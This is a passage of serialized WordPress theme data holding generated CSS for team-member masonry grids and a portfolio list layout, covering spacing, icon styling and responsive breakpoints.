.team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f0fd50633414fc9ff63496fffff76a59.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"c2a8c646baca3a35c2ccac1cb60bc685\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-c2a8c646baca3a35c2ccac1cb60bc685.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"9403334c631287972d500e897137cd5b\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9403334c631287972d500e897137cd5b.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 